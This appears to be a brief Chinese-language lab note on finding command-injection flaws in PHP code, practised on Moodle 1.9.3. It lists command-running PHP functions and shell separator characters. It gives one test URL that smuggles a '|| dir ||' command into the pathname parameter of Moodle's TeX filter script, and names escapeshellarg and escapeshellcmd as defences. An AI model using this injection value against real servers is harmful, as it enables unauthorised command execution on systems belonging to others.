实践对象moodle-1.9.3
介绍http://baike.baidu.com/view/283396.htm
挖掘执行命令漏洞
常见执行命令函数
system()、passthru()、popen()、exec()等函数
搜索
exec,system,popen,passthru,proc_open,shell_exec
执行命令管道符%、|、>
测试
http://127.0.0.1/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+
如何防止命令执行漏洞
escapeshellarg、escapeshellcmd
课后了解
PHP中调用系统命令的system(),exec(),passthru()区别详解
http://leeon.me/a/compare-php-system-executing-command-system-exec-passthru
http://cn.php.net/manual/zh/function.escapeshellcmd.php
http://cduyakei.blog.163.com/blog/static/2554102620074101020279/